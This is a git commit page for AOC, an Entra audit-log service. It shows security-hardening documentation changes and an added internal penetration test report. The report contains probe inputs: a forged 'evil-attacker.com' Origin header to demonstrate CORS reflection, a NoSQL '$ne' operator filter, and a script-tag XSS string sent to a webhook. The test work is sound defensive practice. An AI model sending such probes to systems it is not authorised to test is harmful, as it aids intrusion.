12 Commits
v1.7.4 ... main

Author SHA1 Message Date
fe95dfcfce docs: update AGENTS.md, README.md, DEPLOY.md, ROADMAP.md for v1.7.14 security features
All checks were successful
Release / build-and-push (push) Successful in 21s
CI / lint-and-test (push) Successful in 25s
2026-04-27 16:52:35 +02:00
8d951fc335 v1.7.14: LLM/SIEM domain allowlists, SRI hashes, auth misconfig warning, Azure Key Vault integration
All checks were successful
CI / lint-and-test (push) Successful in 22s
Release / build-and-push (push) Successful in 1m7s
2026-04-27 16:45:06 +02:00
35eca65234 v1.7.13: switch Alpine.js to CSP build, remove unsafe-eval from CSP
All checks were successful
Release / build-and-push (push) Successful in 40s
CI / lint-and-test (push) Successful in 33s
2026-04-27 16:08:34 +02:00
07a841615b v1.7.12: security hardening — CORS fix, security headers, fail-closed rate limiter, OpenAPI docs disabled by default, config auth privacy, webhook validation
All checks were successful
Release / build-and-push (push) Successful in 44s
CI / lint-and-test (push) Successful in 22s
2026-04-27 14:19:28 +02:00
c086fa4260 hotfix(v1.7.11): add unsafe-eval to CSP for Alpine.js
All checks were successful
CI / lint-and-test (push) Successful in 1m26s
Release / build-and-push (push) Successful in 3m1s
2026-04-27 10:39:33 +02:00
be700fefc3 hotfix(v1.7.10): add font-src to CSP for data URI fonts
All checks were successful
CI / lint-and-test (push) Successful in 1m29s
Release / build-and-push (push) Successful in 2m53s
2026-04-27 10:32:35 +02:00
e2cea50d87 hotfix(v1.7.9): auth diagnostics and rate-limit exemptions
All checks were successful
CI / lint-and-test (push) Successful in 2m30s
Release / build-and-push (push) Successful in 4m46s
- Exempt /api/config/auth, /api/config/features, /health, /metrics from rate limiting
- Fix generic exception handler to return proper JSON for HTTPException instead of re-raising
- Add startup log with auth_enabled and version
- Add frontend console logging for auth config fetch errors
- Show 'Auth: OFF' or 'Auth: misconfigured' on auth button instead of empty text
- Add backend debug logging to /api/config/auth endpoint
2026-04-27 10:09:44 +02:00
7fe53f882a hotfix(v1.7.8): restore CORS wildcard and fix CSP for MSAL auth
All checks were successful
CI / lint-and-test (push) Successful in 51s
Release / build-and-push (push) Successful in 2m4s
- Revert automatic CORS wildcard stripping that broke production deployments
  with CORS_ORIGINS=* (now logs a warning but preserves the config)
- Expand CSP headers to allow MSAL auth flows:
  - connect-src: login.microsoftonline.com
  - frame-src: login.microsoftonline.com
  - form-action: login.microsoftonline.com
2026-04-27 09:41:28 +02:00
d01e7801ed security: v1.7.7 hardening release
All checks were successful
CI / lint-and-test (push) Successful in 51s
Release / build-and-push (push) Successful in 1m57s
- Add WEBHOOK_CLIENT_SECRET validation for Graph webhooks
- Add Redis-backed rate limiting (fetch/ask/write/default tiers)
- Validate LLM_BASE_URL to prevent SSRF (HTTPS only, block private IPs)
- Enforce non-wildcard CORS when AUTH_ENABLED=true
- Add Content-Security-Policy headers
- Fix audit middleware to use verified JWT claims via contextvars
- Cap bulk_tags updates to 10,000 documents
- Return generic error messages to clients (no internal detail leakage)
- Strict AlertCondition Pydantic model for alert rules
- Security warning on MCP stdio server startup
- Remove MongoDB/Redis host ports from docker-compose
- Remove mongo_query from /ask API response
2026-04-27 09:16:57 +02:00
7cd7709b4a fix: dedupe alert_rules before creating unique index in setup_indexes()
All checks were successful
CI / lint-and-test (push) Successful in 1m7s
Release / build-and-push (push) Successful in 2m25s
The unique index on alert_rules.name was being created before duplicates
were cleaned up, causing DuplicateKeyError on startup when existing
duplicates were present. Move deduplication into setup_indexes() so it
runs before the unique index is created.

v1.7.6
2026-04-22 15:20:19 +02:00
9cd50d1257 chore: bump version to 1.7.5
All checks were successful
CI / lint-and-test (push) Successful in 30s
Release / build-and-push (push) Successful in 1m29s
2026-04-22 15:13:55 +02:00
646d61f72e fix: dedupe existing rules + unique index to prevent duplicates
- Add unique index on alert_rules.name in setup_indexes()
- seed_default_rules() now removes duplicates by name before upserting
- Keeps the oldest document (_id ascending) when deduping
2026-04-22 15:13:41 +02:00
32 changed files with 1501 additions and 74 deletions

View File

@@ -27,6 +27,18 @@ RETENTION_DAYS=0
# Optional: comma-separated CORS origins (e.g., http://localhost:3000,https://app.example.com) # Optional: comma-separated CORS origins (e.g., http://localhost:3000,https://app.example.com)
CORS_ORIGINS=* CORS_ORIGINS=*
# OpenAPI docs exposure (set true only for dev)
DOCS_ENABLED=false
# LLM endpoint domain restriction (comma-separated, supports wildcards like *.openai.azure.com)
# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com
# SIEM webhook domain restriction (comma-separated)
# SIEM_ALLOWED_DOMAINS=your-siem.com
# Optional Azure Key Vault for secrets storage
# AZURE_KEY_VAULT_NAME=your-keyvault-name
# Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook) # Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook)
SIEM_ENABLED=false SIEM_ENABLED=false
SIEM_WEBHOOK_URL= SIEM_WEBHOOK_URL=
@@ -64,6 +76,10 @@ ALERT_WEBHOOK_URL=
ALERT_WEBHOOK_FORMAT=generic # generic | slack | teams ALERT_WEBHOOK_FORMAT=generic # generic | slack | teams
ALERT_DEDUPE_MINUTES=15 ALERT_DEDUPE_MINUTES=15
# Webhook security (optional but strongly recommended)
# Set this to the same clientState used when creating Graph subscriptions
WEBHOOK_CLIENT_SECRET=
# Optional: privacy / access control # Optional: privacy / access control
# Hide entire services from users without PRIVACY_SERVICE_ROLES # Hide entire services from users without PRIVACY_SERVICE_ROLES
# PRIVACY_SERVICES=Exchange,Teams # PRIVACY_SERVICES=Exchange,Teams

View File

@@ -9,20 +9,24 @@ AOC is a FastAPI microservice that ingests Microsoft Entra (Azure AD) audit logs
- **Runtime**: Python 3.11 (3.14 for tests) - **Runtime**: Python 3.11 (3.14 for tests)
- **Web Framework**: FastAPI + Uvicorn (Gunicorn in production) - **Web Framework**: FastAPI + Uvicorn (Gunicorn in production)
- **Database**: MongoDB (PyMongo) - **Database**: MongoDB (PyMongo)
- **Cache/Queue**: Valkey/Redis 8 (caching + arq async job queue)
- **Frontend**: Alpine.js + HTML/CSS (served as static files from `backend/frontend/`) - **Frontend**: Alpine.js + HTML/CSS (served as static files from `backend/frontend/`)
- **Authentication**: Optional OIDC Bearer token validation against Microsoft Entra (using `python-jose` and MSAL.js on the frontend) - **Authentication**: Optional OIDC Bearer token validation against Microsoft Entra (using `python-jose` and MSAL.js on the frontend)
- **External APIs**: Microsoft Graph API, Office 365 Management Activity API, Azure OpenAI / MS Foundry - **External APIs**: Microsoft Graph API, Office 365 Management Activity API, Azure OpenAI / MS Foundry
- **Deployment**: Docker Compose (dev), Docker Compose + nginx (prod) - **Deployment**: Docker Compose (dev), Docker Compose + nginx (prod)
- **CI/CD**: Gitea Actions (lint + test + Docker build + release) - **CI/CD**: Gitea Actions (lint + test + Docker build + release)
- **Secrets Storage**: Environment variables (`.env`) or optional Azure Key Vault
## Project Structure ## Project Structure
``` ```
backend/ backend/
main.py # FastAPI app, router registration, background periodic fetch main.py # FastAPI app, router registration, background periodic fetch
config.py # Pydantic Settings configuration (loads .env) config.py # Pydantic Settings configuration (loads .env + optional Key Vault)
database.py # MongoClient setup (db = micro_soc, collection = events) database.py # MongoClient setup (db = micro_soc, collection = events)
auth.py # OIDC Bearer token validation, JWKS caching, role/group checks auth.py # OIDC Bearer token validation, JWKS caching, role/group checks
secrets_manager.py # Optional Azure Key Vault integration for secrets
rate_limiter.py # Redis-backed fixed-window rate limiter (fail-closed)
requirements.txt # Python dependencies requirements.txt # Python dependencies
Dockerfile # python:3.11-slim image, non-root user, version baked at build Dockerfile # python:3.11-slim image, non-root user, version baked at build
mcp_server.py # Standalone MCP server for Claude Desktop / Cursor integration mcp_server.py # Standalone MCP server for Claude Desktop / Cursor integration
@@ -34,6 +38,9 @@ backend/
health.py # GET /health, GET /metrics health.py # GET /health, GET /metrics
rules.py # Rule-based alerting endpoints rules.py # Rule-based alerting endpoints
webhooks.py # Microsoft Graph change notification webhooks webhooks.py # Microsoft Graph change notification webhooks
alerts.py # Alert management endpoints
saved_searches.py # Saved filter presets
jobs.py # Async job status polling
graph/ graph/
auth.py # Client credentials token acquisition for Graph auth.py # Client credentials token acquisition for Graph
audit_logs.py # Fetch and enrich directory audit logs from Graph audit_logs.py # Fetch and enrich directory audit logs from Graph
@@ -59,16 +66,42 @@ Copy `.env.example` to `.env` at the repo root and fill in values:
cp .env.example .env cp .env.example .env
``` ```
Key variables: ### Core variables
- `TENANT_ID`, `CLIENT_ID`, `CLIENT_SECRET` — Microsoft app registration credentials (application permissions) - `TENANT_ID`, `CLIENT_ID`, `CLIENT_SECRET` — Microsoft app registration credentials (application permissions)
- `AUTH_ENABLED` — set `true` to protect API/UI with OIDC Bearer tokens - `AUTH_ENABLED` — set `true` to protect API/UI with OIDC Bearer tokens
- `AUTH_TENANT_ID`, `AUTH_CLIENT_ID` — token validation audience/issuer - `AUTH_TENANT_ID`, `AUTH_CLIENT_ID` — token validation audience/issuer
- `AUTH_ALLOWED_ROLES`, `AUTH_ALLOWED_GROUPS` — comma-separated access control lists - `AUTH_ALLOWED_ROLES`, `AUTH_ALLOWED_GROUPS` — comma-separated access control lists
- `ENABLE_PERIODIC_FETCH`, `FETCH_INTERVAL_MINUTES` — background ingestion scheduler - `ENABLE_PERIODIC_FETCH`, `FETCH_INTERVAL_MINUTES` — background ingestion scheduler
- `MONGO_ROOT_USERNAME`, `MONGO_ROOT_PASSWORD`, `MONGO_PORT` — used by Docker Compose for MongoDB - `MONGO_ROOT_USERNAME`, `MONGO_ROOT_PASSWORD`, `MONGO_PORT` — used by Docker Compose for MongoDB
### AI / LLM variables
- `AI_FEATURES_ENABLED` — set `false` to completely disable AI endpoints and UI (default `true`) - `AI_FEATURES_ENABLED` — set `false` to completely disable AI endpoints and UI (default `true`)
- `LLM_API_KEY`, `LLM_BASE_URL`, `LLM_MODEL`, `LLM_MAX_EVENTS`, `LLM_TIMEOUT_SECONDS` — LLM provider settings - `LLM_API_KEY`, `LLM_BASE_URL`, `LLM_MODEL`, `LLM_MAX_EVENTS`, `LLM_TIMEOUT_SECONDS` — LLM provider settings
- `LLM_API_VERSION` — required for Azure OpenAI / MS Foundry endpoints - `LLM_API_VERSION` — required for Azure OpenAI / MS Foundry endpoints
- `LLM_ALLOWED_DOMAINS` — comma-separated domain allowlist for LLM endpoints (e.g. `api.openai.com,*.openai.azure.com`)
### Security variables
- `CORS_ORIGINS` — comma-separated allowed origins (default `*`; set explicit origins in production)
- `DOCS_ENABLED` — set `true` to expose `/docs`, `/redoc`, `/openapi.json` (default `false`)
- `METRICS_ALLOWED_IPS` — comma-separated CIDRs allowed to access `/metrics` (default: private networks + loopback)
- `WEBHOOK_CLIENT_SECRET` — secret for validating Graph webhook `clientState`
- `SIEM_ENABLED`, `SIEM_WEBHOOK_URL` — optional SIEM forwarding
- `SIEM_ALLOWED_DOMAINS` — comma-separated domain allowlist for SIEM webhook URLs
- `RATE_LIMIT_ENABLED`, `RATE_LIMIT_REQUESTS`, `RATE_LIMIT_WINDOW_SECONDS` — Redis-backed rate limiting
### Optional Azure Key Vault
- `AZURE_KEY_VAULT_NAME` — name of the Azure Key Vault to load secrets from
- When set, AOC fetches these secrets at startup:
- `aoc-client-secret``CLIENT_SECRET`
- `aoc-llm-api-key``LLM_API_KEY`
- `aoc-mongo-uri``MONGO_URI`
- `aoc-webhook-client-secret``WEBHOOK_CLIENT_SECRET`
- Requires `azure-identity` and `azure-keyvault-secrets` (uncomment in `requirements.txt`)
### Privacy / access control
- `PRIVACY_SERVICES` — comma-separated services to hide from non-privileged users (e.g. `Exchange,Teams`)
- `PRIVACY_SENSITIVE_OPERATIONS` — comma-separated operations to gate
- `PRIVACY_SERVICE_ROLES` — comma-separated Entra roles that grant access to privacy data
## Build and Run Commands ## Build and Run Commands
@@ -102,7 +135,9 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000
- `GET /api/config/features` — feature flags (`ai_features_enabled`) - `GET /api/config/features` — feature flags (`ai_features_enabled`)
- `POST /api/ask` — natural language query; returns LLM narrative + referenced events (only when `AI_FEATURES_ENABLED=true`) - `POST /api/ask` — natural language query; returns LLM narrative + referenced events (only when `AI_FEATURES_ENABLED=true`)
- `GET /health` — liveness probe with DB connectivity - `GET /health` — liveness probe with DB connectivity
- `GET /metrics` — Prometheus metrics - `GET /metrics` — Prometheus metrics (IP-restricted by default)
- `GET /api/source-health` — last fetch status per ingestion source
- `GET /api/version` — running version
## MCP Server ## MCP Server
@@ -162,16 +197,30 @@ When adding new features or bug fixes, add or update tests in `backend/tests/`.
- Auth middleware and token validation - Auth middleware and token validation
- API endpoints (`/api/events`, `/api/fetch-audit-logs`, `/api/ask`) - API endpoints (`/api/events`, `/api/fetch-audit-logs`, `/api/ask`)
- NLQ time range extraction, entity extraction, query building - NLQ time range extraction, entity extraction, query building
- Rate limiting behavior
## Security Considerations ## Security Considerations
- **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env`. Never commit `.env`. - **Secrets**: `CLIENT_SECRET`, `LLM_API_KEY`, and other credentials come from `.env` or Azure Key Vault. Never commit `.env`.
- **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer claims. Tokens are decoded without strict signature verification (`jwt.get_unverified_claims`), so the tenant and issuer checks are the primary gate. - **Auth validation**: When `AUTH_ENABLED=true`, the backend fetches JWKS from `https://login.microsoftonline.com/{AUTH_TENANT_ID}/v2.0/.well-known/openid-configuration`, caches keys for 1 hour, and validates tenant/issuer/audience claims. Tokens are decoded with RS256 signature verification.
- **Role/Group gating**: Access is allowed if the tokens `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed. - **Role/Group gating**: Access is allowed if the token's `roles` intersect `AUTH_ALLOWED_ROLES` or `groups` intersect `AUTH_ALLOWED_GROUPS`. If neither list is configured, all authenticated users are allowed — a startup warning is logged in this case.
- **CORS**: When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, `allow_credentials` is forced to `false` to prevent cross-origin token leakage.
- **Rate limiting**: Redis-backed fixed-window rate limiting with per-category limits (fetch=10/hr, ask=30/min, write=20/min, default=120/min). Fails closed (returns 429) when Redis is unavailable.
- **Pagination limits**: `page_size` is clamped to a maximum of 500 to prevent large queries. - **Pagination limits**: `page_size` is clamped to a maximum of 500 to prevent large queries.
- **Fetch window cap**: `hours` is clamped to 720 (30 days) to avoid runaway API calls. - **Fetch window cap**: `hours` is clamped to 720 (30 days) to avoid runaway API calls.
- **LLM SSRF guard**: `LLM_BASE_URL` must be HTTPS and cannot point to private IPs. Optional `LLM_ALLOWED_DOMAINS` restricts to specific domains.
- **SIEM SSRF guard**: `SIEM_WEBHOOK_URL` has the same validation as LLM URLs, plus optional `SIEM_ALLOWED_DOMAINS`.
- **Metrics IP gating**: `/metrics` is restricted to private/loopback IPs by default via `METRICS_ALLOWED_IPS`.
- **OpenAPI docs**: Disabled by default (`DOCS_ENABLED=false`). Enable only in development.
- **CSP**: Content-Security-Policy headers are set on all responses. `unsafe-eval` is required for Alpine.js v3 expression evaluation.
- **SRI**: CDN scripts (Alpine.js, MSAL.js) include Subresource Integrity hashes to prevent supply chain compromise.
- **MCP server**: The MCP server bypasses auth entirely. Only run it in trusted environments or behind a VPN. - **MCP server**: The MCP server bypasses auth entirely. Only run it in trusted environments or behind a VPN.
### Security Documentation
- `PEN_TEST_REPORT_v1.7.11.md` — Internal soft penetration test findings and remediation
- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra/token abuse vectors
## Maintenance and Operations ## Maintenance and Operations
The `backend/maintenance.py` script provides two CLI commands useful for backfilling or correcting stored data: The `backend/maintenance.py` script provides two CLI commands useful for backfilling or correcting stored data:

View File

@@ -7,6 +7,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
- **nginx** — reverse proxy, TLS termination, static file serving - **nginx** — reverse proxy, TLS termination, static file serving
- **backend** — FastAPI application (Gunicorn + Uvicorn workers) - **backend** — FastAPI application (Gunicorn + Uvicorn workers)
- **mongo** — MongoDB data store (not exposed externally) - **mongo** — MongoDB data store (not exposed externally)
- **valkey** — Redis-compatible cache and async job queue (not exposed externally)
## Prerequisites ## Prerequisites
@@ -20,7 +21,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
1. **Clone / pull the latest release** 1. **Clone / pull the latest release**
```bash ```bash
git checkout v1.1.0 git checkout v1.7.14
``` ```
2. **Copy and edit environment variables** 2. **Copy and edit environment variables**
@@ -33,7 +34,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
3. **Set the release version** 3. **Set the release version**
```bash ```bash
export AOC_VERSION=v1.1.0 export AOC_VERSION=v1.7.14
``` ```
4. **Deploy** 4. **Deploy**
@@ -53,7 +54,7 @@ AOC runs as a set of Docker containers orchestrated by Docker Compose:
## Updating to a new release ## Updating to a new release
```bash ```bash
export AOC_VERSION=v1.2.0 export AOC_VERSION=v1.7.14
docker compose -f docker-compose.prod.yml pull docker compose -f docker-compose.prod.yml pull
docker compose -f docker-compose.prod.yml up -d docker compose -f docker-compose.prod.yml up -d
``` ```
@@ -75,24 +76,56 @@ docker compose -f docker-compose.prod.yml up -d
Replace the `nginx` service in `docker-compose.prod.yml` with a Certbot-friendly setup (e.g., use the `nginx-proxy` + `acme-companion` stack) or mount the Certbot certificates into `nginx/ssl/`. Replace the `nginx` service in `docker-compose.prod.yml` with a Certbot-friendly setup (e.g., use the `nginx-proxy` + `acme-companion` stack) or mount the Certbot certificates into `nginx/ssl/`.
## Security hardening ## Security Hardening
- MongoDB is **not exposed** to the host — only the backend container can reach it. - MongoDB is **not exposed** to the host — only the backend container can reach it.
- Valkey/Redis is **not exposed** to the host — only the backend container can reach it.
- The backend runs as a non-root (`aoc`) user inside the container. - The backend runs as a non-root (`aoc`) user inside the container.
- nginx adds security headers (`X-Frame-Options`, `X-Content-Type-Options`, etc.). - nginx adds security headers (`X-Frame-Options`, `X-Content-Type-Options`, etc.).
- Keep `.env` out of version control — it is listed in `.gitignore`. - Keep `.env` out of version control — it is listed in `.gitignore`.
- Set `AUTH_ENABLED=true` and configure `AUTH_ALLOWED_ROLES` or `AUTH_ALLOWED_GROUPS` to restrict access to admin/security roles.
- Set explicit `CORS_ORIGINS` — do not use `*` in production when auth is enabled.
- Set `DOCS_ENABLED=false` to hide OpenAPI docs (`/docs`, `/openapi.json`).
- Configure `WEBHOOK_CLIENT_SECRET` to validate Graph webhook notifications.
- Set `LLM_ALLOWED_DOMAINS` if using AI features (e.g. `api.openai.com,*.openai.azure.com`).
- Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding.
- Review `METRICS_ALLOWED_IPS` — defaults to private networks + loopback.
## Azure Key Vault (Optional)
To eliminate long-lived secrets from `.env`:
1. Create an Azure Key Vault and add these secrets:
- `aoc-client-secret` — your Graph app `CLIENT_SECRET`
- `aoc-llm-api-key` — your `LLM_API_KEY` (if using AI)
- `aoc-mongo-uri` — your `MONGO_URI`
- `aoc-webhook-client-secret` — your `WEBHOOK_CLIENT_SECRET`
2. Uncomment `azure-identity` and `azure-keyvault-secrets` in `backend/requirements.txt`
3. Set `AZURE_KEY_VAULT_NAME=your-keyvault-name` in `.env`
4. Grant the container identity `Get` permission on secrets:
- If using Azure Container Instances / AKS: assign a managed identity
- If using VM: assign a managed identity or use a service principal
- If using local Docker: authenticate via `az login` on the host
5. Rebuild and redeploy:
```bash
docker compose -f docker-compose.prod.yml up -d --build
```
## Rollback ## Rollback
```bash ```bash
export AOC_VERSION=v1.0.3 export AOC_VERSION=v1.7.13
docker compose -f docker-compose.prod.yml pull docker compose -f docker-compose.prod.yml pull
docker compose -f docker-compose.prod.yml up -d docker compose -f docker-compose.prod.yml up -d
``` ```
## Monitoring ## Monitoring
- Prometheus metrics: `http://your-host/metrics` - Prometheus metrics: `http://your-host/metrics` (IP-restricted by default)
- Health check: `http://your-host/health` - Health check: `http://your-host/health`
- Container logs: - Container logs:
@@ -100,4 +133,13 @@ docker compose -f docker-compose.prod.yml up -d
docker compose -f docker-compose.prod.yml logs -f backend docker compose -f docker-compose.prod.yml logs -f backend
docker compose -f docker-compose.prod.yml logs -f nginx docker compose -f docker-compose.prod.yml logs -f nginx
docker compose -f docker-compose.prod.yml logs -f mongo docker compose -f docker-compose.prod.yml logs -f mongo
docker compose -f docker-compose.prod.yml logs -f valkey
``` ```
## Troubleshooting
- **Auth warning in logs**: "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured" — set these to restrict access.
- **CORS issues**: Set `CORS_ORIGINS` to your exact frontend origin(s). Wildcard with auth enabled disables credentials.
- **Rate limiting 429s**: Check Redis/Valkey connectivity. The rate limiter fails closed (returns 429) when Redis is down.
- **LLM errors**: Verify `LLM_BASE_URL` is in `LLM_ALLOWED_DOMAINS` if the allowlist is configured.
- **SIEM not forwarding**: Verify `SIEM_WEBHOOK_URL` uses HTTPS and is in `SIEM_ALLOWED_DOMAINS`.

203
PEN_TEST_REPORT_v1.7.11.md Normal file
View File

@@ -0,0 +1,203 @@
# AOC v1.7.11 Soft Penetration Test Report
**Date:** 2026-04-27
**Target:** Local AOC instance (port 8001), auth disabled, AI disabled
**Tester:** Automated + manual curl-based probing
**Scope:** FastAPI backend, REST API endpoints, middleware, headers
---
## Executive Summary
AOC v1.7.11 has one **CRITICAL** vulnerability (CORS credentials leak) and several defense-in-depth gaps. The good news: input validation, NoSQL injection resistance, and error handling are solid. The bad news: CORS is dangerously permissive, security headers are missing, and the rate limiter fails open on Redis failure.
| Severity | Count | Categories |
|----------|-------|------------|
| CRITICAL | 1 | CORS with credentials |
| HIGH | 1 | Missing security headers |
| MEDIUM | 2 | Fail-open rate limiter, OpenAPI exposure |
| LOW | 2 | Information disclosure, webhook content injection |
| INFO | 3 | Positive findings (no stack traces, input validation, NoSQL resistance) |
---
## CRITICAL
### 1. CORS Reflects Any Origin with `allow_credentials=true`
**Finding:** The CORS middleware returns `Access-Control-Allow-Origin: <any origin>` AND `Access-Control-Allow-Credentials: true` for every origin that sends an `Origin` header.
**Evidence:**
```bash
curl -H "Origin: https://evil-attacker.com" http://localhost:8001/api/config/auth
# Response headers:
# access-control-allow-origin: https://evil-attacker.com
# access-control-allow-credentials: true
```
**Impact:** An attacker can host a malicious page on any domain and make authenticated cross-origin requests to the AOC API using the victim's browser cookies/tokens. This effectively bypasses Same-Origin Policy for authenticated actions.
**Root Cause:** `main.py` configures CORS with `allow_origins=["*"]` (from `CORS_ORIGINS` env var, default `"*"`) AND `allow_credentials=True`. According to CORS spec, a wildcard origin with credentials is technically invalid, but Starlette/FastAPI appears to reflect the request origin instead.
**Recommendation:**
- When `AUTH_ENABLED=true`, reject requests from origins not in an explicit allowlist.
- Set `allow_credentials=False` if wildcard origins are needed.
- Or, require `CORS_ORIGINS` to be explicitly configured (no default wildcard) when auth is enabled.
---
## HIGH
### 2. Missing Security Headers
**Finding:** The following security headers are absent from all responses:
| Header | Purpose | Status |
|--------|---------|--------|
| `X-Content-Type-Options: nosniff` | Prevents MIME sniffing | MISSING |
| `X-Frame-Options: DENY` or `SAMEORIGIN` | Clickjacking protection | MISSING |
| `Strict-Transport-Security` | HSTS enforcement | MISSING |
| `Referrer-Policy: strict-origin-when-cross-origin` | Limits referrer leakage | MISSING |
| `Permissions-Policy` | Restricts browser features | MISSING |
**Impact:** Increased attack surface for clickjacking, MIME confusion attacks, and information leakage via referrer headers.
**Recommendation:** Add a security headers middleware to set these on all responses. HSTS only when served over HTTPS.
---
## MEDIUM
### 3. Rate Limiter Fails Open on Redis Failure
**Finding:** In `rate_limiter.py` line 81-82:
```python
except Exception as exc:
logger.warning("Rate limiter Redis error; allowing request", error=str(exc))
```
If Redis becomes unreachable, all rate limits are silently bypassed.
**Evidence:** When Redis was down, 150+ requests to `/api/events` all returned 200 with no 429s.
**Impact:** A DoS on Redis (or a network partition) removes all rate limiting, allowing unlimited API abuse.
**Recommendation:** Make the rate limiter fail-closed: return 429 or 503 when Redis is unavailable, or use an in-memory fallback with a conservative limit.
### 4. OpenAPI Schema Publicly Exposed
**Finding:** `/docs`, `/redoc`, and `/openapi.json` are accessible without authentication and return the full API schema.
**Evidence:**
```bash
curl -s http://localhost:8001/openapi.json | jq '.paths | keys'
# Returns all 15+ API paths including internal endpoints
```
**Impact:** Attackers get a complete map of the API, including request/response schemas, parameter types, and endpoint structure. This significantly reduces reconnaissance time.
**Recommendation:** Disable OpenAPI docs in production (`docs_url=None, redoc_url=None, openapi_url=None`) or gate them behind admin authentication.
---
## LOW
### 5. Information Disclosure via `/api/config/auth` and `/metrics`
**Finding:**
- `/api/config/auth` leaks `tenant_id` and `client_id` even when auth is disabled. These values fall back to the Graph API credentials (`TENANT_ID`/`CLIENT_ID`), which may be sensitive.
- `/metrics` exposes Python version (`3.14.3`), GC statistics, and application-internal metric names.
**Evidence:**
```json
{
"auth_enabled": false,
"tenant_id": "0ec9f34c-17c8-4541-b084-7d64ecdcc997",
"client_id": "cc31fd45-1eca-431f-a2c6-ba81cd4c5d50"
}
```
**Impact:** Low direct impact (tenant/client IDs are not secrets), but aids reconnaissance and narrows the attack surface.
**Recommendation:**
- Return empty strings for `tenant_id`/`client_id` when `auth_enabled=false`.
- Gate `/metrics` behind IP allowlist or admin auth (standard Prometheus practice).
### 6. Webhook Validation Token Echoed Without Sanitization
**Finding:** The `/api/webhooks/graph` endpoint echoes `validationToken` query parameter as `text/plain` without any sanitization or length limits.
**Evidence:**
```bash
curl -X POST "http://localhost:8001/api/webhooks/graph?validationToken=<script>alert(1)</script>"
# Returns: <script>alert(1)</script> with Content-Type: text/plain
```
**Impact:** Low in the intended Microsoft Graph flow (token is Microsoft-generated), but if the endpoint is hit directly, an attacker could use this for cache poisoning, response splitting, or social engineering by making the endpoint return attacker-controlled content.
**Recommendation:** Validate the validationToken format (e.g., JWT-like structure, length limits) before echoing, or set `Content-Type: text/plain; charset=utf-8` with `X-Content-Type-Options: nosniff` to reduce MIME confusion risk.
---
## INFO (Positive Findings)
### A. No Stack Traces in Error Responses
All errors (422, 404, 429, 500 if triggered) return generic JSON messages without internal details or stack traces. Good.
### B. Pydantic Input Validation is Effective
- `page_size` capped at 500 (returns 422 for 501, 0, -1)
- `hours` capped at 720 (returns 422 for 721)
- Invalid cursors return 400 with "Invalid cursor"
- Malformed JSON bodies return 422 with field-level validation errors
- `AlertCondition` op field strictly validated against `Literal["eq", "neq", "contains", "in", "after_hours"]`
### C. NoSQL Injection Resistant
MongoDB operators passed as string filter values are treated as literals, not operators:
```bash
curl "http://localhost:8001/api/events?operation=\$ne"
# Returns 0 results (treated as literal string "$ne")
```
The `_build_query()` function in `events.py` uses `re.escape()` for search input and constructs queries safely.
### D. Bulk Tags Pre-Count Check Works
`bulk_tags` endpoint capped at 10,000 matched documents via pre-count check. 93 events were successfully tagged with no bypass.
### E. Rate Limiting Works When Redis is Healthy
- `/api/fetch-audit-logs`: 429 after 11 requests (limit: 10/hr)
- `/api/events`: 429 after ~120 requests (limit: 120/min)
- Exempt paths work correctly: `/health`, `/metrics`, `/api/config/auth`, `/api/config/features`
- `Retry-After` header is returned on 429 responses
---
## Recommendations Summary
| Priority | Action | Effort |
|----------|--------|--------|
| P0 | Fix CORS: do not allow credentials with wildcard/reflected origins | Small |
| P1 | Add security headers middleware (X-Content-Type-Options, X-Frame-Options, HSTS, Referrer-Policy) | Small |
| P2 | Make rate limiter fail-closed on Redis errors | Small |
| P2 | Disable OpenAPI docs in production or gate behind auth | Small |
| P3 | Sanitize or validate webhook validationToken before echo | Small |
| P3 | Gate `/metrics` behind IP allowlist | Small |
| P3 | Hide tenant_id/client_id from `/api/config/auth` when auth is disabled | Tiny |
| P4 | Consider Alpine.js CSP build to remove `unsafe-eval` from script-src | Medium |
---
## Test Environment
```
Backend: uvicorn on localhost:8001 (auth=false, ai=false)
MongoDB: docker container, port 27018
Redis: docker container, port 6380
```
*Test commands and raw outputs available in `/tmp/pen_test*.sh` scripts.*

View File

@@ -11,13 +11,14 @@ FastAPI microservice that ingests Microsoft Entra (Azure AD) and other admin aud
- Optional OIDC bearer auth (Entra) to protect the API/UI and gate access by roles/groups. - Optional OIDC bearer auth (Entra) to protect the API/UI and gate access by roles/groups.
- Natural language query (`/api/ask`) powered by LLM (OpenAI, Azure OpenAI, or any compatible API). - Natural language query (`/api/ask`) powered by LLM (OpenAI, Azure OpenAI, or any compatible API).
- MCP server for Claude Desktop / Cursor integration. - MCP server for Claude Desktop / Cursor integration.
- Optional Azure Key Vault integration for secrets storage.
## Prerequisites (macOS) ## Prerequisites (macOS)
- Python 3.11 - Python 3.11
- Docker Desktop (for the quickest start) or a local MongoDB instance - Docker Desktop (for the quickest start) or a local MongoDB instance
- An Entra app registration with **Application** permission `AuditLog.Read.All` and admin consent granted - An Entra app registration with **Application** permission `AuditLog.Read.All` and admin consent granted
- Also required to fetch other sources: - Also required to fetch other sources:
- `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registrations API permissions for Office 365 Management APIs) - `https://manage.office.com/.default` (Audit API) with `ActivityFeed.Read`/`ActivityFeed.ReadDlp` (built into the app registration's API permissions for Office 365 Management APIs)
- Intune audit: `DeviceManagementConfiguration.Read.All` (or broader) for `/deviceManagement/auditEvents` - Intune audit: `DeviceManagementConfiguration.Read.All` (or broader) for `/deviceManagement/auditEvents`
